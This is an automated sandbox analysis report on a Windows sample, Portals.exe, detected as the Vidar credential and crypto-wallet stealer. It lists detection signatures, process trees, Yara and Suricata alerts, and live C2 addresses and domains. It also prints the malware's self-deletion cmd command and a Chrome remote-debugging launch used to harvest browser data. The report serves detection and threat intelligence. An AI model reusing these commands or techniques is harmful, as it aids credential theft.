Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Portals.exe

Overview

General Information

Sample name:Portals.exe
Analysis ID:1637568
MD5:1f2c4ac075b7a79917c290f0b9fd27b6
SHA1:26b2d2ed94bea477e82f1dfe490aff259824ac5d
SHA256:7b7f4f1480f606b0e49ade273dd67ff9a636c428319fe074f9d98d0f76612728
Tags:exeVidaruser-BastianHein
Infos:

Detection

Vidar
Score:100
Range:0 - 100
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Attempt to bypass Chrome Application-Bound Encryption
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Vidar stealer
C2 URLs / IPs found in malware configuration
Contains functionality to inject code into remote processes
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign processes
Joe Sandbox ML detected suspicious sample
Searches for specific processes (likely to inject)
Self deletion via cmd or bat file
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found decision node followed by non-executed suspicious APIs
Found evasive API chain (date check)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Browser Started with Remote Debugging
Suricata IDS alerts with low severity for network traffic
Uses Microsoft's Enhanced Cryptographic Provider
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • Portals.exe (PID: 7976 cmdline: "C:\Users\user\Desktop\Portals.exe" MD5: 1F2C4AC075B7A79917C290F0B9FD27B6)
    • Portals.exe (PID: 8012 cmdline: "C:\Users\user\Desktop\Portals.exe" MD5: 1F2C4AC075B7A79917C290F0B9FD27B6)
      • chrome.exe (PID: 7712 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default" MD5: E81F54E6C1129887AEA47E7D092680BF)
        • chrome.exe (PID: 2084 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2172,i,4152094786765586208,9576853780185441522,262144 --variations-seed-version=20250306-183004.429000 --mojo-platform-channel-handle=2440 /prefetch:3 MD5: E81F54E6C1129887AEA47E7D092680BF)
      • cmd.exe (PID: 2292 cmdline: "C:\Windows\system32\cmd.exe" /c timeout /t 11 & del /f /q "C:\Users\user\Desktop\Portals.exe" & rd /s /q "C:\ProgramData\i58ym" & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 3788 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • timeout.exe (PID: 6444 cmdline: timeout /t 11 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
    • WerFault.exe (PID: 8112 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7976 -s 784 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
VidarVidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

Malware Configuration

Threatname: Vidar

{"C2 url": ["https://steamcommunity.com/profiles/76561199829660832"]}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000001.00000002.2197435961.0000000000400000.00000040.00000400.00020000.00000000.sdmpinfostealer_win_vidar_strings_nov23Finds Vidar samples based on the specific stringsSekoia.io
    • 0x1fcca:$str01: MachineID:
    • 0x1ef53:$str02: Work Dir: In memory
    • 0x1fd01:$str03: [Hardware]
    • 0x1fcb3:$str04: VideoCard:
    • 0x1f6b5:$str05: [Processes]
    • 0x1f6c1:$str06: [Software]
    • 0x1efd0:$str07: information.txt
    • 0x1fa36:$str08: %s\*
    • 0x1fa83:$str08: %s\*
    • 0x1f206:$str11: Software\Martin Prikryl\WinSCP 2\Configuration
    • 0x1f59f:$str12: UseMasterPassword
    • 0x1fd0d:$str13: Soft: WinSCP
    • 0x1f7eb:$str14: <Pass encoding="base64">
    • 0x1fcf0:$str15: Soft: FileZilla
    • 0x1efc2:$str16: passwords.txt
    • 0x1f5ca:$str17: build_id
    • 0x1f679:$str18: file_data
    Process Memory Space: Portals.exe PID: 8012JoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
      Process Memory Space: Portals.exe PID: 8012JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        1.2.Portals.exe.400000.0.raw.unpackinfostealer_win_vidar_strings_nov23Finds Vidar samples based on the specific stringsSekoia.io
        • 0x1fcca:$str01: MachineID:
        • 0x1ef53:$str02: Work Dir: In memory
        • 0x1fd01:$str03: [Hardware]
        • 0x1fcb3:$str04: VideoCard:
        • 0x1f6b5:$str05: [Processes]
        • 0x1f6c1:$str06: [Software]
        • 0x1efd0:$str07: information.txt
        • 0x1fa36:$str08: %s\*
        • 0x1fa83:$str08: %s\*
        • 0x1f206:$str11: Software\Martin Prikryl\WinSCP 2\Configuration
        • 0x1f59f:$str12: UseMasterPassword
        • 0x1fd0d:$str13: Soft: WinSCP
        • 0x1f7eb:$str14: <Pass encoding="base64">
        • 0x1fcf0:$str15: Soft: FileZilla
        • 0x1efc2:$str16: passwords.txt
        • 0x1f5ca:$str17: build_id
        • 0x1f679:$str18: file_data
        1.2.Portals.exe.400000.0.unpackinfostealer_win_vidar_strings_nov23Finds Vidar samples based on the specific stringsSekoia.io
        • 0x1e2ca:$str01: MachineID:
        • 0x1d553:$str02: Work Dir: In memory
        • 0x1e301:$str03: [Hardware]
        • 0x1e2b3:$str04: VideoCard:
        • 0x1dcb5:$str05: [Processes]
        • 0x1dcc1:$str06: [Software]
        • 0x1d5d0:$str07: information.txt
        • 0x1e036:$str08: %s\*
        • 0x1e083:$str08: %s\*
        • 0x1d806:$str11: Software\Martin Prikryl\WinSCP 2\Configuration
        • 0x1db9f:$str12: UseMasterPassword
        • 0x1e30d:$str13: Soft: WinSCP
        • 0x1ddeb:$str14: <Pass encoding="base64">
        • 0x1e2f0:$str15: Soft: FileZilla
        • 0x1d5c2:$str16: passwords.txt
        • 0x1dbca:$str17: build_id
        • 0x1dc79:$str18: file_data
        0.2.Portals.exe.3659550.0.raw.unpackinfostealer_win_vidar_strings_nov23Finds Vidar samples based on the specific stringsSekoia.io
        • 0x436ea:$str01: MachineID:
        • 0x42973:$str02: Work Dir: In memory
        • 0x43721:$str03: [Hardware]
        • 0x436d3:$str04: VideoCard:
        • 0x430d5:$str05: [Processes]
        • 0x430e1:$str06: [Software]
        • 0x429f0:$str07: information.txt
        • 0x43456:$str08: %s\*
        • 0x434a3:$str08: %s\*
        • 0x42c26:$str11: Software\Martin Prikryl\WinSCP 2\Configuration
        • 0x42fbf:$str12: UseMasterPassword
        • 0x4372d:$str13: Soft: WinSCP
        • 0x4320b:$str14: <Pass encoding="base64">
        • 0x43710:$str15: Soft: FileZilla
        • 0x429e2:$str16: passwords.txt
        • 0x42fea:$str17: build_id
        • 0x43099:$str18: file_data

        Sigma Signatures

        System Summary

        barindex
        Sigma detected: Browser Started with Remote Debugging
        Source: Process startedAuthor: pH-T (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default", CommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default", CommandLine|base64offset|contains: ^", Image: C:\Program Files\Google\Chrome\Application\chrome.exe, NewProcessName: C:\Program Files\Google\Chrome\Application\chrome.exe, OriginalFileName: C:\Program Files\Google\Chrome\Application\chrome.exe, ParentCommandLine: "C:\Users\user\Desktop\Portals.exe", ParentImage: C:\Users\user\Desktop\Portals.exe, ParentProcessId: 8012, ParentProcessName: Portals.exe, ProcessCommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default", ProcessId: 7712, ProcessName: chrome.exe

        Suricata Signatures

        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2025-03-13T18:02:16.209193+010020287653Unknown Traffic192.168.2.449732116.202.4.223443TCP
        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2025-03-13T18:02:48.970855+010020442471Malware Command and Control Activity Detected94.130.189.58443192.168.2.449756TCP
        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2025-03-13T18:02:51.711154+010020518311Malware Command and Control Activity Detected94.130.189.58443192.168.2.449757TCP
        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2025-03-13T18:02:51.710634+010020490871A Network Trojan was detected192.168.2.44975794.130.189.58443TCP
        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2025-03-13T18:02:54.315069+010020593311Malware Command and Control Activity Detected192.168.2.44975994.130.189.58443TCP
        2025-03-13T18:02:56.166830+010020593311Malware Command and Control Activity Detected192.168.2.44976194.130.189.58443TCP
        2025-03-13T18:02:56.178080+010020593311Malware Command and Control Activity Detected192.168.2.44976094.130.189.58443TCP
        2025-03-13T18:02:58.283635+010020593311Malware Command and Control Activity Detected192.168.2.44976294.130.189.58443TCP
        2025-03-13T18:03:00.393558+010020593311Malware Command and Control Activity Detected192.168.2.44976394.130.189.58443TCP
        2025-03-13T18:03:09.685394+010020593311Malware Command and Control Activity Detected192.168.2.44978094.130.189.58443TCP
        2025-03-13T18:03:10.707191+010020593311Malware Command and Control Activity Detected192.168.2.44978194.130.189.58443TCP
        2025-03-13T18:03:11.692763+010020593311Malware Command and Control Activity Detected192.168.2.44978294.130.189.58443TCP
        2025-03-13T18:03:12.731457+010020593311Malware Command and Control Activity Detected192.168.2.44978394.130.189.58443TCP
        2025-03-13T18:03:14.891369+010020593311Malware Command and Control Activity Detected192.168.2.44978494.130.189.58443TCP
        2025-03-13T18:03:16.527099+010020593311Malware Command and Control Activity Detected192.168.2.44978594.130.189.58443TCP
        2025-03-13T18:03:18.280715+010020593311Malware Command and Control Activity Detected192.168.2.44978694.130.189.58443TCP
        2025-03-13T18:03:20.402868+010020593311Malware Command and Control Activity Detected192.168.2.44978794.130.189.58443TCP
        2025-03-13T18:03:28.649798+010020593311Malware Command and Control Activity Detected192.168.2.44979094.130.189.58443TCP
        2025-03-13T18:03:30.844897+010020593311Malware Command and Control Activity Detected192.168.2.44979194.130.189.58443TCP
        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2025-03-13T18:02:56.166830+010028596361Malware Command and Control Activity Detected192.168.2.44976194.130.189.58443TCP
        2025-03-13T18:02:58.283635+010028596361Malware Command and Control Activity Detected192.168.2.44976294.130.189.58443TCP
        2025-03-13T18:03:00.393558+010028596361Malware Command and Control Activity Detected192.168.2.44976394.130.189.58443TCP
        2025-03-13T18:03:11.692763+010028596361Malware Command and Control Activity Detected192.168.2.44978294.130.189.58443TCP
        2025-03-13T18:03:12.731457+010028596361Malware Command and Control Activity Detected192.168.2.44978394.130.189.58443TCP
        2025-03-13T18:03:14.891369+010028596361Malware Command and Control Activity Detected192.168.2.44978494.130.189.58443TCP
        2025-03-13T18:03:16.527099+010028596361Malware Command and Control Activity Detected192.168.2.44978594.130.189.58443TCP
        2025-03-13T18:03:18.280715+010028596361Malware Command and Control Activity Detected192.168.2.44978694.130.189.58443TCP
        2025-03-13T18:03:20.402868+010028596361Malware Command and Control Activity Detected192.168.2.44978794.130.189.58443TCP
        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2025-03-13T18:02:43.319161+010028593781Malware Command and Control Activity Detected192.168.2.44975494.130.189.58443TCP

        Joe Sandbox Signatures

        Click to jump to signature section

        Show All Signature Results

        AV Detection

        barindex
        Antivirus / Scanner detection for submitted sample
        Source: Portals.exeAvira: detected
        Antivirus detection for URL or domain
        Source: https://b.b.goldenloafuae.com/HSAvira URL Cloud: Label: malware
        Source: https://116.202.4.223Avira URL Cloud: Label: malware
        Source: https://b.b.goldenloafuae.comAvira URL Cloud: Label: malware
        Source: https://b.b.goldenloafuae.com/OzGS%Avira URL Cloud: Label: malware
        Found malware configuration
        Source: 00000001.00000002.2197855678.0000000001395000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: Vidar {"C2 url": ["https://steamcommunity.com/profiles/76561199829660832"]}
        Multi AV Scanner detection for submitted file
        Source: Portals.exeVirustotal: Detection: 69%Perma Link
        Source: Portals.exeReversingLabs: Detection: 86%
        Joe Sandbox ML detected suspicious sample
        Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
        Source: C:\Users\user\Desktop\Portals.exeCode function: 1_2_00406A10 StrStrA,lstrlenA,LocalAlloc,CryptUnprotectData,LocalAlloc,LocalFree,lstrlenA,1_2_00406A10
        Source: C:\Users\user\Desktop\Portals.exeCode function: 1_2_00410830 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,GetLastError,GetProcessHeap,HeapFree,1_2_00410830
        Source: C:\Users\user\Desktop\Portals.exeCode function: 1_2_0040A150 BCryptCloseAlgorithmProvider,BCryptDestroyKey,BCryptCloseAlgorithmProvider,1_2_0040A150
        Source: C:\Users\user\Desktop\Portals.exeCode function: 1_2_00406CF0 LocalAlloc,BCryptDecrypt,1_2_00406CF0
        Source: C:\Users\user\Desktop\Portals.exeCode function: 1_2_00406940 BCryptCloseAlgorithmProvider,BCryptDestroyKey,1_2_00406940
        Source: C:\Users\user\Desktop\Portals.exeCode function: 1_2_0040A560 StrCmpCA,BCryptCloseAlgorithmProvider,BCryptDestroyKey,BCryptCloseAlgorithmProvider,BCryptDestroyKey,1_2_0040A560
        Source: C:\Users\user\Desktop\Portals.exeCode function: 1_2_00406980 BCryptOpenAlgorithmProvider,BCryptSetProperty,BCryptGenerateSymmetricKey,BCryptCloseAlgorithmProvider,BCryptDestroyKey,1_2_00406980
        Source: unknownHTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.4:49720 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 23.197.127.21:443 -> 192.168.2.4:49730 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 204.79.197.222:443 -> 192.168.2.4:49733 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.4:49752 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 94.130.189.58:443 -> 192.168.2.4:49753 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 94.130.189.58:443 -> 192.168.2.4:49754 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 94.130.189.58:443 -> 192.168.2.4:49755 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 94.130.189.58:443 -> 192.168.2.4:49759 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 94.130.189.58:443 -> 192.168.2.4:49760 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 94.130.189.58:443 -> 192.168.2.4:49761 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 94.130.189.58:443 -> 192.168.2.4:49782 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 94.130.189.58:443 -> 192.168.2.4:49783 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 94.130.189.58:443 -> 192.168.2.4:49784 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 94.130.189.58:443 -> 192.168.2.4:49786 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 94.130.189.58:443 -> 192.168.2.4:49787 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 94.130.189.58:443 -> 192.168.2.4:49788 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 94.130.189.58:443 -> 192.168.2.4:49791 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 94.130.189.58:443 -> 192.168.2.4:49792 version: TLS 1.2
        Source: Portals.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
        Source: Binary string: C:\Users\Hand1\source\repos\Portals\Portals\obj\Release\Portals.pdb source: Portals.exe
        Source: Binary string: System.Windows.Forms.pdb source: WER4DB2.tmp.dmp.4.dr
        Source: Binary string: Portals.pdb source: WER4DB2.tmp.dmp.4.dr
        Source: Binary string: System.Windows.Forms.pdbh source: WER4DB2.tmp.dmp.4.dr
        Source: Binary string: mscorlib.pdb source: WER4DB2.tmp.dmp.4.dr
        Source: Binary string: System.ni.pdbRSDS source: WER4DB2.tmp.dmp.4.dr
        Source: Binary string: mscorlib.ni.pdb source: WER4DB2.tmp.dmp.4.dr
        Source: Binary string: System.pdb) source: WER4DB2.tmp.dmp.4.dr
        Source: Binary string: C:\Users\Hand1\source\repos\Portals\Portals\obj\Release\Portals.pdb<;V; H;_CorExeMainmscoree.dll source: Portals.exe
        Source: Binary string: mscorlib.ni.pdbRSDS source: WER4DB2.tmp.dmp.4.dr
        Source: Binary string: System.ni.pdb source: WER4DB2.tmp.dmp.4.dr
        Source: Binary string: System.pdb source: WER4DB2.tmp.dmp.4.dr
        Source: C:\Users\user\Desktop\Portals.exeCode function: 1_2_00414E70 wsprintfA,FindFirstFileA,DeleteFileA,FindNextFileA,strlen,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,FindClose,1_2_00414E70
        Source: C:\Users\user\Desktop\Portals.exeCode function: 1_2_00407210 ExpandEnvironmentStringsA,FindFirstFileA,FindNextFileA,strlen,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,CopyFileA,StrCmpCA,CopyFileA,Sleep,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,CopyFileA,DeleteFileA,StrCmpCA,memset,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,DeleteFileA,memset,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindClose,1_2_00407210
        Source: C:\Users\user\Desktop\Portals.exeCode function: 1_2_0040B6B0 FindFirstFileA,FindNextFileA,strlen,StrCmpCA,CopyFileA,Sleep,DeleteFileA,FindClose,1_2_0040B6B0
        Source: C:\Users\user\Desktop\Portals.exeCode function: 1_2_00415EB0 SHGetFolderPathA,wsprintfA,FindFirstFileA,FindNextFileA,FindNextFileA,FindNextFileA,strcpy,_splitpath,strcpy,strlen,isupper,wsprintfA,strcpy,strlen,SHFileOperationA,FindClose,1_2_00415EB0
        Source: C:\Users\user\Desktop\Portals.exeCode function: 1_2_00408360 FindFirstFileA,CopyFileA,FindNextFileA,FindNextFileA,FindNextFileA,strlen,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,FindClose,1_2_00408360
        Source: C:\Users\user\Desktop\Portals.exeCode function: 1_2_00413FD0 wsprintfA,FindFirstFileA,FindNextFileA,strlen,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindClose,1_2_00413FD0
        Source: C:\Users\user\Desktop\Portals.exeCode function: 1_2_004013F0 FindFirstFileA,FindClose,FindNextFileA,strlen,FindFirstFileA,DeleteFileA,FindNextFileA,CopyFileA,CopyFileA,DeleteFileA,FindClose,1_2_004013F0
        Source: C:\Users\user\Desktop\Portals.exeCode function: 1_2_00413580 wsprintfA,FindFirstFileA,memset,memset,FindNextFileA,strlen,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,memset,lstrcatA,strtok_s,SymMatchString,strtok_s,memset,lstrcatA,strtok_s,PathMatchSpecA,DeleteFileA,DeleteFileA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindClose,1_2_00413580
        Source: C:\Users\user\Desktop\Portals.exeCode function: 1_2_004097B0 FindFirstFileA,FindNextFileA,strlen,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,1_2_004097B0
        Source: C:\Users\user\Desktop\Portals.exeCode function: 1_2_0040ACD0 wsprintfA,FindFirstFileA,FindNextFileA,FindNextFileA,FindNextFileA,strlen,lstrlenA,DeleteFileA,CopyFileA,FindClose,1_2_0040ACD0
        Source: C:\Users\user\Desktop\Portals.exeCode function: 1_2_00408C90 lstrcpyA,lstrcatA,FindFirstFileA,FindNextFileA,strlen,lstrcpyA,lstrcatA,lstrcatA,lstrcatA,memset,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcpyA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,CopyFileA,CopyFileA,CopyFileA,CopyFileA,CopyFileA,CopyFileA,CopyFileA,CopyFileA,CopyFileA,FindFirstFileA,FindNextFileA,strlen,lstrcpyA,lstrcatA,lstrcatA,lstrcatA,lstrcpyA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,FindClose,FindClose,DeleteFileA,_invalid_parameter_noinfo_noreturn,1_2_00408C90
        Source: C:\Users\user\Desktop\Portals.exeCode function: 1_2_00414950 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,strlen,FindClose,lstrcatA,lstrcatA,lstrcatA,lstrlenA,lstrlenA,1_2_00414950
        Source: C:\Users\user\Desktop\Portals.exeCode function: 1_2_00409560 ??2@YAPAXI@Z,??2@YAPAXI@Z,_invalid_parameter_noinfo_noreturn,FindFirstFileA,FindNextFileA,strlen,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,1_2_00409560
        Source: C:\Users\user\Desktop\Portals.exeCode function: 1_2_00413AF0 SymMatchString,SymMatchString,SymMatchString,GetLogicalDriveStringsA,memset,GetDriveTypeA,lstrcpyA,lstrcpyA,lstrcpyA,lstrlenA,1_2_00413AF0
        Source: C:\Users\user\Desktop\Portals.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\Jump to behavior
        Source: C:\Users\user\Desktop\Portals.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\Jump to behavior
        Source: C:\Users\user\Desktop\Portals.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\Jump to behavior
        Source: C:\Users\user\Desktop\Portals.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\Jump to behavior
        Source: C:\Users\user\Desktop\Portals.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\Jump to behavior
        Source: C:\Users\user\Desktop\Portals.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\Jump to behavior
        Source: chrome.exeMemory has grown: Private usage: 8MB later: 38MB

        Networking

        barindex
        Suricata IDS alerts for network traffic
        Source: Network trafficSuricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.4:49760 -> 94.130.189.58:443
        Source: Network trafficSuricata IDS: 2049087 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M1 : 192.168.2.4:49757 -> 94.130.189.58:443
        Source: Network trafficSuricata IDS: 2859378 - Severity 1 - ETPRO MALWARE Win32/Stealc/Vidar Stealer Host Details Exfil (POST) M2 : 192.168.2.4:49754 -> 94.130.189.58:443
        Source: Network trafficSuricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.4:49759 -> 94.130.189.58:443
        Source: Network trafficSuricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.4:49762 -> 94.130.189.58:443
        Source: Network trafficSuricata IDS: 2859636 - Severity 1 - ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST) : 192.168.2.4:49762 -> 94.130.189.58:443
        Source: Network trafficSuricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.4:49761 -> 94.130.189.58:443
        Source: Network trafficSuricata IDS: 2859636 - Severity 1 - ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST) : 192.168.2.4:49761 -> 94.130.189.58:443
        Source: Network trafficSuricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.4:49785 -> 94.130.189.58:443
        Source: Network trafficSuricata IDS: 2859636 - Severity 1 - ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST) : 192.168.2.4:49785 -> 94.130.189.58:443
        Source: Network trafficSuricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.4:49763 -> 94.130.189.58:443
        Source: Network trafficSuricata IDS: 2859636 - Severity 1 - ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST) : 192.168.2.4:49763 -> 94.130.189.58:443
        Source: Network trafficSuricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.4:49786 -> 94.130.189.58:443
        Source: Network trafficSuricata IDS: 2859636 - Severity 1 - ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST) : 192.168.2.4:49786 -> 94.130.189.58:443
        Source: Network trafficSuricata IDS: 2051831 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 : 94.130.189.58:443 -> 192.168.2.4:49757
        Source: Network trafficSuricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.4:49783 -> 94.130.189.58:443
        Source: Network trafficSuricata IDS: 2859636 - Severity 1 - ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST) : 192.168.2.4:49783 -> 94.130.189.58:443
        Source: Network trafficSuricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 94.130.189.58:443 -> 192.168.2.4:49756
        Source: Network trafficSuricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.4:49782 -> 94.130.189.58:443
        Source: Network trafficSuricata IDS: 2859636 - Severity 1 - ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST) : 192.168.2.4:49782 -> 94.130.189.58:443
        Source: Network trafficSuricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.4:49787 -> 94.130.189.58:443
        Source: Network trafficSuricata IDS: 2859636 - Severity 1 - ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST) : 192.168.2.4:49787 -> 94.130.189.58:443
        Source: Network trafficSuricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.4:49780 -> 94.130.189.58:443
        Source: Network trafficSuricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.4:49790 -> 94.130.189.58:443
        Source: Network trafficSuricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.4:49781 -> 94.130.189.58:443
        Source: Network trafficSuricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.4:49791 -> 94.130.189.58:443
        Source: Network trafficSuricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.4:49784 -> 94.130.189.58:443
